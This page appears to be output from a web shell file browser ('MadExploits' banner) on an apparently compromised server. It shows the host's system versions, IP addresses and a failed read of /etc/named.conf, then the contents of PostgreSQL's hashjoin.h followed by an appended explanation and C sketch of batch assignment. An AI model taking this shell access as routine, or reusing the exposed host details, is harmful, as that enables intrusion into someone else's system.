Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
194.233.91.196 | 216.73.216.172
Can't read [ /etc/named.conf ]
PHP 7.4.32
finalho
www.github.com/MadExploits
/usr/include/pgsql/server/executor/
Name                    Size      Permission
execdebug.h             4.32 KB   -rw-r--r--
execdesc.h              2.33 KB   -rw-r--r--
executor.h              14.56 KB  -rw-r--r--
functions.h             1.12 KB   -rw-r--r--
hashjoin.h              7.18 KB   -rw-r--r--
instrument.h            2.79 KB   -rw-r--r--
nodeAgg.h               782 B     -rw-r--r--
nodeAppend.h            701 B     -rw-r--r--
nodeBitmapAnd.h         738 B     -rw-r--r--
nodeBitmapHeapscan.h    813 B     -rw-r--r--
nodeBitmapIndexscan.h   822 B     -rw-r--r--
nodeBitmapOr.h          724 B     -rw-r--r--
nodeCtescan.h           715 B     -rw-r--r--
nodeForeignscan.h       771 B     -rw-r--r--
nodeFunctionscan.h      785 B     -rw-r--r--
nodeGroup.h             716 B     -rw-r--r--
nodeHash.h              1.88 KB   -rw-r--r--
nodeHashjoin.h          890 B     -rw-r--r--
nodeIndexonlyscan.h     920 B     -rw-r--r--
nodeIndexscan.h         1.52 KB   -rw-r--r--
nodeLimit.h             687 B     -rw-r--r--
nodeLockRows.h          729 B     -rw-r--r--
nodeMaterial.h          838 B     -rw-r--r--
nodeMergeAppend.h       771 B     -rw-r--r--
nodeMergejoin.h         743 B     -rw-r--r--
nodeModifyTable.h       768 B     -rw-r--r--
nodeNestloop.h          729 B     -rw-r--r--
nodeRecursiveunion.h    813 B     -rw-r--r--
nodeResult.h            802 B     -rw-r--r--
nodeSeqscan.h           812 B     -rw-r--r--
nodeSetOp.h             687 B     -rw-r--r--
nodeSort.h              766 B     -rw-r--r--
nodeSubplan.h           812 B     -rw-r--r--
nodeSubqueryscan.h      785 B     -rw-r--r--
nodeTidscan.h           812 B     -rw-r--r--
nodeUnique.h            701 B     -rw-r--r--
nodeValuesscan.h        866 B     -rw-r--r--
nodeWindowAgg.h         776 B     -rw-r--r--
nodeWorktablescan.h     799 B     -rw-r--r--
spi.h                   5.53 KB   -rw-r--r--
spi_priv.h              3.61 KB   -rw-r--r--
tstoreReceiver.h        767 B     -rw-r--r--
tuptable.h              8.4 KB    -rw-r--r--
Code Editor: hashjoin.h
/*-------------------------------------------------------------------------
 *
 * hashjoin.h
 *    internal structures for hash joins
 *
 *
 * Portions Copyright (c) 1996-2012, PostgreSQL Global Development Group
 * Portions Copyright (c) 1994, Regents of the University of California
 *
 * src/include/executor/hashjoin.h
 *
 *-------------------------------------------------------------------------
 */
#ifndef HASHJOIN_H
#define HASHJOIN_H

#include "nodes/execnodes.h"
#include "storage/buffile.h"

/* ----------------------------------------------------------------
 *              hash-join hash table structures
 *
 * Each active hashjoin has a HashJoinTable control block, which is
 * palloc'd in the executor's per-query context.  All other storage needed
 * for the hashjoin is kept in private memory contexts, two for each hashjoin.
 * This makes it easy and fast to release the storage when we don't need it
 * anymore.  (Exception: data associated with the temp files lives in the
 * per-query context too, since we always call buffile.c in that context.)
 *
 * The hashtable contexts are made children of the per-query context, ensuring
 * that they will be discarded at end of statement even if the join is
 * aborted early by an error.  (Likewise, any temporary files we make will
 * be cleaned up by the virtual file manager in event of an error.)
 *
 * Storage that should live through the entire join is allocated from the
 * "hashCxt", while storage that is only wanted for the current batch is
 * allocated in the "batchCxt".  By resetting the batchCxt at the end of
 * each batch, we free all the per-batch storage reliably and without tedium.
 *
 * During first scan of inner relation, we get its tuples from executor.
 * If nbatch > 1 then tuples that don't belong in first batch get saved
 * into inner-batch temp files.  The same statements apply for the
 * first scan of the outer relation, except we write tuples to outer-batch
 * temp files.  After finishing the first scan, we do the following for
 * each remaining batch:
 *    1. Read tuples from inner batch file, load into hash buckets.
 *    2. Read tuples from outer batch file, match to hash buckets and output.
 *
 * It is possible to increase nbatch on the fly if the in-memory hash table
 * gets too big.  The hash-value-to-batch computation is arranged so that this
 * can only cause a tuple to go into a later batch than previously thought,
 * never into an earlier batch.  When we increase nbatch, we rescan the hash
 * table and dump out any tuples that are now of a later batch to the correct
 * inner batch file.  Subsequently, while reading either inner or outer batch
 * files, we might find tuples that no longer belong to the current batch;
 * if so, we just dump them out to the correct batch file.
 * ----------------------------------------------------------------
 */

/* these are in nodes/execnodes.h: */
/* typedef struct HashJoinTupleData *HashJoinTuple; */
/* typedef struct HashJoinTableData *HashJoinTable; */

typedef struct HashJoinTupleData
{
    struct HashJoinTupleData *next;   /* link to next tuple in same bucket */
    uint32      hashvalue;            /* tuple's hash code */
    /* Tuple data, in MinimalTuple format, follows on a MAXALIGN boundary */
} HashJoinTupleData;

#define HJTUPLE_OVERHEAD  MAXALIGN(sizeof(HashJoinTupleData))
#define HJTUPLE_MINTUPLE(hjtup)  \
    ((MinimalTuple) ((char *) (hjtup) + HJTUPLE_OVERHEAD))

/*
 * If the outer relation's distribution is sufficiently nonuniform, we attempt
 * to optimize the join by treating the hash values corresponding to the outer
 * relation's MCVs specially.  Inner relation tuples matching these hash
 * values go into the "skew" hashtable instead of the main hashtable, and
 * outer relation tuples with these hash values are matched against that
 * table instead of the main one.  Thus, tuples with these hash values are
 * effectively handled as part of the first batch and will never go to disk.
 * The skew hashtable is limited to SKEW_WORK_MEM_PERCENT of the total memory
 * allowed for the join; while building the hashtables, we decrease the number
 * of MCVs being specially treated if needed to stay under this limit.
 *
 * Note: you might wonder why we look at the outer relation stats for this,
 * rather than the inner.  One reason is that the outer relation is typically
 * bigger, so we get more I/O savings by optimizing for its most common values.
 * Also, for similarly-sized relations, the planner prefers to put the more
 * uniformly distributed relation on the inside, so we're more likely to find
 * interesting skew in the outer relation.
 */
typedef struct HashSkewBucket
{
    uint32      hashvalue;      /* common hash value */
    HashJoinTuple tuples;       /* linked list of inner-relation tuples */
} HashSkewBucket;

#define SKEW_BUCKET_OVERHEAD  MAXALIGN(sizeof(HashSkewBucket))
#define INVALID_SKEW_BUCKET_NO  (-1)
#define SKEW_WORK_MEM_PERCENT  2
#define SKEW_MIN_OUTER_FRACTION  0.01


typedef struct HashJoinTableData
{
    int         nbuckets;       /* # buckets in the in-memory hash table */
    int         log2_nbuckets;  /* its log2 (nbuckets must be a power of 2) */

    /* buckets[i] is head of list of tuples in i'th in-memory bucket */
    struct HashJoinTupleData **buckets;
    /* buckets array is per-batch storage, as are all the tuples */

    bool        keepNulls;      /* true to store unmatchable NULL tuples */

    bool        skewEnabled;    /* are we using skew optimization? */
    HashSkewBucket **skewBucket;    /* hashtable of skew buckets */
    int         skewBucketLen;  /* size of skewBucket array (a power of 2!) */
    int         nSkewBuckets;   /* number of active skew buckets */
    int        *skewBucketNums; /* array indexes of active skew buckets */

    int         nbatch;         /* number of batches */
    int         curbatch;       /* current batch #; 0 during 1st pass */

    int         nbatch_original;    /* nbatch when we started inner scan */
    int         nbatch_outstart;    /* nbatch when we started outer scan */

    bool        growEnabled;    /* flag to shut off nbatch increases */

    double      totalTuples;    /* # tuples obtained from inner plan */

    /*
     * These arrays are allocated for the life of the hash join, but only if
     * nbatch > 1.  A file is opened only when we first write a tuple into it
     * (otherwise its pointer remains NULL).  Note that the zero'th array
     * elements never get used, since we will process rather than dump out
     * any tuples of batch zero.
     */
    BufFile   **innerBatchFile; /* buffered virtual temp file per batch */
    BufFile   **outerBatchFile; /* buffered virtual temp file per batch */

    /*
     * Info about the datatype-specific hash functions for the datatypes being
     * hashed.  These are arrays of the same length as the number of hash join
     * clauses (hash keys).
     */
    FmgrInfo   *outer_hashfunctions;    /* lookup data for hash functions */
    FmgrInfo   *inner_hashfunctions;    /* lookup data for hash functions */
    bool       *hashStrict;     /* is each hash join operator strict? */

    Size        spaceUsed;      /* memory space currently used by tuples */
    Size        spaceAllowed;   /* upper limit for space used */
    Size        spacePeak;      /* peak space used */
    Size        spaceUsedSkew;  /* skew hash table's current space usage */
    Size        spaceAllowedSkew;   /* upper limit for skew hashtable */

    MemoryContext hashCxt;      /* context for whole-hash-join storage */
    MemoryContext batchCxt;     /* context for this-batch-only storage */
} HashJoinTableData;

#endif   /* HASHJOIN_H */
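The comments above reference a "hash-value-to-batch computation" arranged so that growing nbatch can only move a tuple into a later batch, never an earlier one. The following is a minimal standalone sketch of that property only; the function and the sample values are invented for this illustration (PostgreSQL's actual computation lives in the executor source, not in this header). It assumes nbuckets and nbatch are powers of two, as the struct comments require.

/*
 * Illustrative sketch (not part of hashjoin.h): low bits of the hash value
 * pick the bucket, the next bits pick the batch.
 */
#include <stdint.h>
#include <stdio.h>

static void
toy_get_bucket_and_batch(uint32_t hashvalue,
                         int nbuckets, int log2_nbuckets, int nbatch,
                         int *bucketno, int *batchno)
{
    /* low log2_nbuckets bits select the in-memory bucket */
    *bucketno = hashvalue & (nbuckets - 1);
    /* the bits above those select the batch (batch 0 if there is only one) */
    *batchno = (nbatch > 1) ? (int) ((hashvalue >> log2_nbuckets) & (nbatch - 1)) : 0;
}

int
main(void)
{
    uint32_t    hashvalue = 0xDEADBEEF;   /* arbitrary sample hash value */
    int         bucketno, batchno;

    /* with 1024 buckets and 4 batches */
    toy_get_bucket_and_batch(hashvalue, 1024, 10, 4, &bucketno, &batchno);
    printf("nbatch=4: bucket=%d batch=%d\n", bucketno, batchno);

    /* after growing to 8 batches the batch number stays the same or increases */
    toy_get_bucket_and_batch(hashvalue, 1024, 10, 8, &bucketno, &batchno);
    printf("nbatch=8: bucket=%d batch=%d\n", bucketno, batchno);
    return 0;
}

Doubling nbatch only widens the batch mask by one bit; the low bits of the batch number are unchanged, so the recomputed batch index is always greater than or equal to the old one. That is why the rescan described in the comments only ever dumps tuples forward to later inner batch files.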